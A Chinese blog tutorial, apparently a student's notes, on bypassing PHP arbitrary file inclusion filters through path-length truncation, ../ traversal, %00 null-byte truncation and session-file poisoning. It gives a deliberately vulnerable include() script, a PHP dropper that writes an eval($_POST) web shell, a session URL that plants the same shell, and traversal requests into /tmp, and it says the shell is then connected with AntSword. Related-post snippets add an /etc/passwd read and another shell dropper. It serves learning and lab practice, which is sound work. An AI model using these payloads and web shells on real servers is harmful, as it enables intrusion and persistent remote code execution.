任意文件包含漏洞(2)

最新推荐文章于 2024-05-20 08:38:41 发布
最新推荐文章于 2024-05-20 08:38:41 发布
阅读量2.8k 收藏 3
点赞数 12
分类专栏: web渗透 文章标签: 文件包含漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45663905/article/details/108140104
版权

目录

windows系统

1.路径长度绕过

wj.php

<?php
$a=@$_GET['123'];
include($a.'.html');
?>

如果限制了文件类型,比如这里只能包含html后缀的文件,那么就可以使用此方法

简介

操作系统存在最大路径长度的限制。windows系统,文件名最长256个字符,可以输入超过最大路径长度的目录,这样系统就会将后面的路径丢弃,导致扩展名被中途截断

在文件后面加.
如:
info.php...........................................................................................................................................................................................................................................................................................html

.超过256个就行,后面多出来的...........................................html不会被识别到

在这里插入图片描述
info.php

<?php
phpinfo();
?>

2. …/绕过

有时候会限制文件包含的路径,比如当前路径
./当前目录
../上级目录
/根目录

<?php
$a=@$_GET['123'];
include('./'.$a.'.php');
?>

如果说路径长度绕过是为了干掉$a后面的'php',那么../就是为了干掉$a前面的'./'

在这里插入图片描述

2.5 ./

./ 之所以放在2.5的位置
是因为他放的位置不同,作用也不同
info.php./././././././……././././././html
则和1 . 的作用一样,绕过后缀

如果是./info.php
则后2../的作用一样,绕过路径(尽管./表示当前路径,默认就是表示包含当前路径的文件,所以加不加都无所谓)

3. %00截断

简介

%00被认为是结束符,后面的数据会被直接忽略,导致扩展名截断。
攻击者可以利用这个漏洞绕过扩展名过滤

和00截断有同样效果的还有:?#(#必须写成%23)

使用条件

(1) magic_quotes_gpc=off
(2) PHP<5.3.4

详见此文
https://blog.csdn.net/weixin_45663905/article/details/107559653

操作

scshell.php

<?php fputs(fopen('data.php','w'),'<?php eval($_POST[123])?>');?>

在这里插入图片描述
生成了data.php文件
在这里插入图片描述接下来使用蚁剑连接,就不多说了




4.session 文件

使用条件

session文件的内容可控的,而且session文件的保存目录已知,或者保存在默认目录,管理员没有改

可以通过phpinfo()来查找session的路径
在这里插入图片描述

操作

sess.php

<?php
session_start();
$ctfs=$_GET['se'];
$_SESSION["username"]=$ctfs;
?>

1.在url里面上输入想加入session的内容

http://127.0.0.1/cy/sess.php?se=<?php fputs(fopen('data2.php','w'),'<?php eval($_POST[123])?>');?>

使用F12,点存储,按cookie,看session
在这里插入图片描述
这里4d14ba13dfd1e23c0476a8a887ca5602就是此session的文件名
但是默认有个sess前缀,即应该为sess_4d14ba13dfd1e23c0476a8a887ca5602

查看该session文件

http://127.0.0.1/cy/wj.php?123=../../tmp/tmp/sess_4d14ba13dfd1e23c0476a8a887ca5602%00

发现没什么显示
在这里插入图片描述

此时上帝视角,进入tmp目录,发现了sess文件已经写进脚本
啥?你说为啥能访问www目录之外的tmp文件。
php是一门语言,它能访问的不仅仅只是web程序,利用文件里的函数,web程序之外的文件自然也能访问

在这里插入图片描述
而且在sess.php同目录下,已经生成了一个data2.php文件,
在这里插入图片描述
通过蚁剑连接data2.php文件

在这里插入图片描述

5.错误日志

https://blog.csdn.net/weixin_45663905/article/details/108148898

编码绕过

这不算一种独立的绕过方式,
如果在使用上面的方法里,看到过滤了/ ,.,可以使用url编码绕过

/     %2f  
.     %2e

但是在进行编码的时候,发现.编码后还是.,而%2e解码后却成了.,不知道是啥原因
嗯学完这个知识点就去看url编码
在这里插入图片描述

在这里插入图片描述

linux系统

路径长度绕过

linux系统,文件名最长4096个字符(浏览器最多只能输入300多个字符,所以需要抓包)
前面加././././…………xx.php

错误日志

ssh连接失败,会保存到日志

……

ihszg
关注
  • 12
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 12
    评论
专栏目录
文件包含漏洞
weixin_43778463的博客
09-23 951
文件包含
任意文件包含(搭的环境)
3569
07-27 341
首先自己搭一个环境 在centos虚拟机里边的根目录下创建一个show.php $name = $_GET['name']; include({"${name}");              //注意,这里要用双引号,因为里边有变量,只有双引号里边才可以识别变量 ?> 然后访问虚拟机 192.168.0.107/show.php?name=/etc/passwd 访问成
文件包含漏洞全面详解
最新发布
qq_53058639的博客
05-20 884
和SQL注入等攻击方式一样,文件包含漏洞也是一种注入型漏洞,其本质就是输入一段用户能够控制的脚本或者代码,并让服务端执行。什么叫包含呢?以PHP为例,我们常常把可重复使用的函数写入到单个文件中,在使用该函数时,直接调用此文件,而无需再次编写函数,这一过程叫做包含。有时候由于网站功能需求,会让前端用户选择要包含的文件,而开发人员又没有对要包含的文件进行安全考虑,就导致攻击者可以通过修改文件的位置来让后台执行任意文件,从而导致文件包含漏洞。以PHP为例,常用的文件包含函数有以下四种。
任意文件包含【理解】
weixin_51494407的博客
11-15 57
2006年,PHPMyAdmin的文件包含漏洞被曝光,攻击者可以通过构造恶意的URL参数,让PHPMyAdmin包含远程服务器上的文件,从而实现远程执行任意代码的攻击。2012年,Wordpress的文件包含漏洞被曝光,攻击者可以通过构造恶意的URL参数,让Wordpress包含远程服务器上的文件,从而实现远程执行任意代码的攻击。此时如果对文件来源不严格过滤审查,就容易包含恶意文件。RFI:remote file include 远程文件包含漏洞,被包含的文件在第三方服务器(如站库分离)
任意文件包含漏洞
甲方乙方
07-27 6614
看我说web安全之文件包含     最近重点学的是web安全知识,“顺流而进,逆流而上”,那我就倒着总结下学的东西吧。。。
【WEB漏洞原理】任意文件包含漏洞
过期的秋刀鱼
08-31 1031
程序开发人员通常会把可重复使用函数或语句写到单个文件中,形成“封装”。在使用某个功能的时候,直接调用此文件,无需再次编写,提高代码重用性,减少代码量。这种调用文件的过程通常称为包含。程序开发人员都希望代码更加灵活,所以会把被包含的文件的路径设置为变量,来进行动态调用(包含),但正是由于这种灵活性,如果被包含文件的路径客户端可控,造成任意文件包含漏洞。几乎所有的脚本都会提供文件包含的功能,文件包含漏洞在PHP 的Web 应用中居多,在JSP/ASP/ASP.NET 程序中比较少。
用友NC任意文件上传漏洞利用工具
04-14
用友NC任意文件上传漏洞利用工具,用友NC6.5的某个页面,存在任意文件上传漏洞漏洞成因在于上传文件处未作类型限制,未经身份验证的攻击者可通过向目标系统发送特制数据包来利用此漏洞,成功利用此漏洞的远程攻击...
nc57-任意文件读取漏洞补丁
06-08
【标题】"nc57-任意文件读取漏洞补丁" 涉及的是一个针对NC57软件的安全问题,该补丁旨在修复一个可能导致任意文件读取的漏洞。在网络安全领域,这样的漏洞通常是非常严重的问题,因为它允许攻击者未经授权访问系统上...
eyoucms V1.0.4 后台任意文件读取漏洞1
08-03
### eyoucms V1.0.4 后台任意文件读取漏洞详解 #### 漏洞背景 易优CMS(eyoucms)是一款基于PHP+MySQL开发的企业级建站系统,广泛应用于中小企业的网站搭建。它支持多平台访问,包括PC端、移动端以及微信平台。...
101web漏洞挖掘之任意文件读取漏洞1
08-03
这种漏洞允许攻击者通过构造特定的请求,读取服务器上的任意文件,包括敏感的配置文件、源代码、系统文件等。攻击者一旦利用这种漏洞,不仅可以获取系统关键信息,还可能进一步引发SSRF(Server-Side Request ...
74cms v4.2.X任意文件读取漏洞
09-06
在网络安全领域,74cms v4.2.X任意文件读取漏洞是一个重要的安全问题,影响了74cms的多个版本,包括v4.2、v4.2.3以及v5.0.1。这个漏洞允许攻击者通过特定的手段读取服务器上任意文件,这可能导致敏感信息泄露,甚至...
任意文件包含漏洞(1)
这是笔者初学时所做的笔记,有错误的地方太多了,有些结论也只是笔者的一家之言。请自行判断
08-23 3142
文件包含不是漏洞任意文件包含才是漏洞 分类 LFI:local fileinclude 本地文件上传 RFI:remote file include 远程文件上传 原理 危害 包含的函数 include() :执行错误时,给出一个警告信息,继续运行 include_once() : 功能如上,一个文件只调用一次,如果重复调用一个文件,则 require() : 如果require()执行有错误,函数会输出错误信息,并终止脚本运行 require_once() include() 执行到该函数时才会
任意文件包含漏洞原理解析及演示
热门推荐
qq_41679358的博客
08-20 1万+
本文转自行云博客https://www.xy586.top/ 文章目录原理分类PHP文件包含的函数伪协议演示php://input 伪协议data://text/plain 伪协议zip:// 伪协议 原理 文件包含漏洞:即file inclusion,意思是文件包含,是指当服务器开启allow_url_include选项时,就可以通过PHP的某些特性函数(include(),require()和include_once(),requir_once())利用URL去动态包含文件,此时如果没有对文件来源.
文件包含任意文件包含的理解
wj33333的博客
11-15 356
PHP 文件包含是程序设计的基础功能之一,能够减少代码量,提高开发效率。但是使用文件包含功能时,实现了动态包含,就有产生文件包含漏洞的风险。如果实现动态包含的参数,Web 应用没有进行严格的校验,浏览器客户端用户可以影响控制被包含文件的路径,就会产生任意文件包含漏洞。利用文件包含漏洞,也可以读取敏感文件。利用php://fileter 读取。目标文件存在(已知目标文件路径);
任意文件包含漏洞的绕过方式
qq_41679358的博客
08-23 3753
本文转自行云博客https://www.xy586.top/ 文章目录前期准备长目录截断原理payload%00截断原理payload基于session机制传马条件:payload总结 前期准备 file.php代码 <?php $a = $_GET['a']; include($a.'.html'); ?> hack.php代码 <?php fputs(fopen('shell.php','w'),'<?php eval($_POST["cmd"]);?&.
php 任意文件包含漏洞,PHP:ThinkCMFX任意文件包含漏洞
weixin_39552768的博客
04-14 100
前言:最近爆出来的漏洞,ThinkCmfX版本应该是通杀的,基于3.X Thinkphp开发的代码下载地址:https://gitee.com/thinkcmf/ThinkCMFX/releases我们就拿这个payload来进行分析http://127.0.0.1/index.php?a=fetch&content=我们要知道tp框架的特性,可以通过这种形式的路由方式进行访问相应的功能点...
文件包含漏洞】——文件包含漏洞入门
weixin_45588247的博客
08-01 1280
文章目录一、实验目的:二、工具:三、实验环境:四、漏洞说明:1. 什么是文件包含?2. 漏洞成因:3. 文件包含相关的四个函数:4. 漏洞原理:5. 文件包含漏洞的形成,需要满足两个条件:6. 文件包含漏洞危害:7. 文件包含各个脚本代码:六、文件类型:1. 本地文件包含(LFI):1.2 常见的敏感信息路径:2. 远程文件包含(RFI):2.1 原理:五、环境准备:1. 文件包含的两个重要的php参数:2. 修改`php.ini`配置文件:3. 虚拟机关闭window系统的安全中心的病毒实时防护:六、实验
文件包含漏洞详解
good good study
03-05 5085
大多数情况下,文件包含函数中包含的代码文件是固定的,如上面中的include "./info.php"直接是写死了,因此也不会出现安全问题。但是,有些时候,文件包含的代码文件被写成了一个变量,且这个变量可以由前端用户传进来,这种情况下,如果没有做足够的安全考虑,则可能会引发文件包含漏洞。上面说了文件包含漏洞的成因是因为代码实现了动态包含且包含的路径可控,于是我们将代码进行修改为动态传参的一种方式,建立文件index.php,文件内容如下。文件包含是PHP 的基本功能之一,有本地文件包含和远程文件包含之分。
任意文件上传漏洞原理
10-31
为了防止任意文件上传漏洞,开发人员应该对上传的文件进行充分的验证和过滤,包括文件类型、文件大小、文件名等。同时,服务器也应该对上传的文件进行检查和过滤,以确保上传的文件不包含恶意代码。
评论 12
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值